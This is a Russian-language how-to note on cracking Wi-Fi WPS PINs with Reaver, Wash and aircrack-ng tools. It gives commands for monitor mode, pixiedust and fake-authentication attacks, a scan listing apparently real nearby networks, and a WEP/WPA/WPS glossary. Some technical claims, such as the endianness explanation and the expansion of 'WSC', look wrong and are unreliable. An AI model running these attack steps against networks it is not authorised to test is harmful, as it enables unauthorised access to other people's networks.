Reaver & Wash

Created Thursday 18 July 2024

Reaver это брут-форс, при хорошем сигнале точки доступа, процесс может занять от 4 до 8 часов и не факт что получится.  Использовать совместно с пакетом "aircrak-ng".

Для начала надо заметить, что в Reaver окончательно не решена проблема с аунтефикацией на точке доступа, причина в том что создавалась утилита для x86-64 использующие порядок байтов "Little-endian" LE - от меньшего к большему, в то время как большинство современных роутеров используют представление байт BE - от большего к меньшему "Big-endian" и конечно нужны обходные пути, поэтому возникновение ошибок: Sending EAPOL START request как и WARNING; Receive timeout occurred (произошел timeout) это врожденные недостатки Reaver. Утилита "aireplay-ng  из пакета aircrack-ng" это один из способов.

Сканируем сеть с помощью  WASH, предварительно переведя в режим мониторинга:

# airmon-ng  start wlan0 

# wash -i wlan0mon 

airmon-ng перевел интерфейс в режим моноторинга и изменил название название добавив окончание "mon", однако возможно понадобится отключить "руками" старый интерфейс:

# ifconfig wlan0 down 

BSSID                         Ch    dBm     WPS   Lck      Vendor              ESSID

B0:CC:FE:35:67:D8      1      -75        2.0      No       Unknown          SH

70:4F:57:AE:34:1E        1      -85        2.0      No       RalinkTe          melo4ek

84:16:F9:6F:60:4A         1      -84        1.0      No       AtherosC          A-LINK_604

48:22:54:A5:A4:BA        1      -89        2.0      No       RalinkTe          TP-Link_A4BA

B0:AC:D2:33:B5:F7       1      -90        1.0      No       RealtekS           Ramzes

C8:D3:A3:E8:AF:C9      1      -85        2.0      No       Broadcom       DSL-2640U

...........................................................................................................

Далее Reaver:

Атака на Wi-Fi с WPS, используя Reaver Reaver (reaver-wps-fork-t6x)


$ sudo reaver -i wlan0mon -b C4:04:15:8C:9B:78 -vv

-i ключь используемый при запуске

Далее имя интерфейса  "wlan0mon"

-b mac адрес точки доступа

-v  или  -vv вербальность, или количество показываемой информации

-A     авторизацию производит другая программа

-p    Если у вас уже есть пин, то для получения пароля Wi-Fi сети вам нужно в Reaver использовать опцию -p, после которой указать известный ПИН: # reaver -i wlan0 -b EE:43:F6:CF:C3:08 -p 36158805

Для применения "Pixiewps"  (запуск  атаки "pixiedust") применить ключ "-K 1"

$ sudo reaver -i wlan0mon -b 48:22:54:A5:A4:BA -vv -K 1

"--dh-small" - вид атаки как  и "pixiedust"

Если точка доступа меняет каналы, Reaver соответственно тоже, но это можно отключить зафиксироваи канал интерфейса (--fixed)

$ sudo reaver -i wlan0mon -b 48:22:54:A5:A4:BA -vv --fixed

Если надо можно непосредственно указать канал ( -c 1  например):

$ sudo reaver -i wlan0mon -b 48:22:54:A5:A4:BA -vv --dh-small -c 1

====================================

Для преодоления указанных недостатков, может помочь ручная аунтефикация на точке доступа

при помощи утилиты "aireplay-ng  из пакета aircrack-ng, но небольшая проблема в том что утилита не умеет самостоя тельно выставлять требуемый канал, поэтому ставят в ручную

# airmon-ng  start wlp8s0  чем переводим интерфейс в режим моноторинга

*** # ifconfig wlp8s0 down (возможно надо отключить)  # wash -i wlp8s0mon

# iwconfig wlp8s0mon channel 3 (например)

# aireplay-ng -1 5 -a C4:04:15:8C:9B:78 wlp8s0mon

После того как мы убедимся что аунтефикация проходит успешно надо прервать ее выполнение Ctl+C и перезапустить в фоновом режиме (не закрывать терминал как минимум), но эстетичней foreground:

# aireplay-ng -1 5 -a C4:04:15:8C:9B:78 wlp8s0mon > /dev/null &  

Затем запускаем Reaver  c ключем -A который говорит ему что авторизацией будут за него заниматься другие

# reaver -i wlp8s0mon -b C4:04:15:8C:9B:78 -vv -A

Вообще появление ошибки "Receive timeout occurred" означит что авторизация не успешна и Reaver повторит попытку, если это происходит не постоянно то это не критично, можно сказать что подобные сообшения это вполне естественно в вербальном режиме..и конечно соединение должно быть надежным, то есть уровень сигнала высокий, если надо стоит увеличить мощность передатчика

PS: 

WEP Wired Equivalent Privacy  — алгоритм для обеспечения безопасности сетей Wi-Fi. Используется для обеспечения конфиденциальности и защиты передаваемых данных авторизированных пользователей беспроводной сети от прослушивания. Существует две разновидности WEP: WEP-40 и WEP-104, различающиеся только длиной ключа. В настоящее время данная технология является устаревшей, так как её взлом может быть осуществлен всего за несколько минут. Тем не менее, она продолжает широко использоваться. Для безопасности в сетях Wi-Fi рекомендуется использовать WPA. WEP часто неправильно называют Wireless Encryption Protocol.

WPS - Wi-Fi Protected Setup  (защищённая установка) Целью протокола WPS является упрощение процесса настройки беспроводной сети, изначальноt называybt Wi-Fi Simple Config. Протокол призван оказать помощь пользователям, которые не обладают широкими знаниями о безопасности в беспроводных сетях

Официально мспользуется с 8 января 2007 года.

WPA - Wi-Fi Protected Access, WPA2 и WPA3 — программы сертификации устройств беспроводной связи.В WPA обеспечена поддержка стандартов 802.1X, а также протокола EAP - Extensible Authentication Protocol, расширяемый протокол аутентификации. Большим плюсом WPA является возможность работы технологии на существующем аппаратном обеспечении Wi-Fi.

WPA, по сути, является суммой нескольких технологий : WPA = 802.1X + EAP + TKIP + MIC

WPA2 определяется стандартом IEEE 802.11i, принятым в июне 2004 года, и призван заменить WPA. В нём реализовано CCMP и шифрование AES, за счёт чего WPA2 стал более защищённым, чем свой предшественник. С 13 марта 2006 года поддержка WPA2 является обязательным условием для всех сертифицированных устройств Wi-Fi. Можно повторить для ясности, что пароли это WPA и WPA2. а WPS это пользовательскии инструмент настройки взвимодействия узла и точки доступа сертифицированного с помощью WPA/WPA2.

WPA3 - В начале 2018 года международный альянс Wi-Fi Alliance анонсировал новейший протокол беспроводной безопасности — WPA3. Основными дополнениями, реализованными в этом протоколе, станут: встроенная защита от брутфорс-атак (прощай reaver); индивидуальное шифрование данных для усиления конфиденциальности пользователей в открытых сетях Wi-Fi


WPA-PSK - WPA имеет упрощённый режим, получивший название Pre-Shared Key (WPA-PSK, Предварительно общий ключ). При применении режима PSK необходимо ввести один пароль для каждого отдельного узла беспроводной сети, если пароли совпадают с записями в базе, пользователь получит разрешение на доступ в сеть.

EAP - extensible authentication protocol, расширяемый протокол аутентификации (EAP) основа для механизма аутентификации пользователей.

EAPoL - extensible authentication protocol over LAN

Sending EAPOL START request

WARNING: Receive timeout occurred

Теория в том, что доступ к роутеру осуществляется по PIN-коду, который обычно пишется на коробке роутера, PIN-код WPS содержит 8 знаков (цифр), соответственно существует 10^8 вариантов, в процессе авторизации PIN-код делится нa 2 части обработка которых происходит независимо друг от друга, клиент и точка доступа обмениваются друг с другом последовательными сообщениями М1 - М8:

Received M1 message

Sending M2 message

Received M1 message

Sending WSC NACK          Wireless Support Complete (WSC) - Полная поддержка беспроводной связи (WSC)

Received WSC NACK

https://cybercop-training.ch/?p=97  https://cybercop--training-ch.translate.goog

Recived death requesn # сообщение может свидетельствовать о том что надо перегрузить адаптер

Если после отправки М4 точка доступа отвечает кодом EAP-NACK, значит первая половина кода ошибочная

Если после отправки М6 точка доступа отвечает кодом EAP-NACK, значит вторая половина кода ошибочная

В процессе подбора можно заметить что количество отсылаемых - принимаемых сообщений сокращается это говорит о том что дело идет к завершению (как минимум процесс идет), как и значения подбираемых пинов 01315677, 01445671, 01465679, 01575675 и тд.

В чем уязвимость, уязвимость заключается в том, что метод авторизации содержит недочеты, позволяющие существенно упростить прямой перебор PIN-кодов, по сути– реализуется эффективная брутфорс-атака.


Немаловажная деталь втом, что на многих домашних роутерах PIN-авторизация: 

а) включена по-умолчанию; 

б) не накладывает никаких ограничений на отправителя при отправке множества некорректных PIN-кодов. 

Это открывает возможность по неограниченному перебору пин-кодов на таких роутерах.


Ctl+C прервет и сохранит сессию, позже предложит продолжить.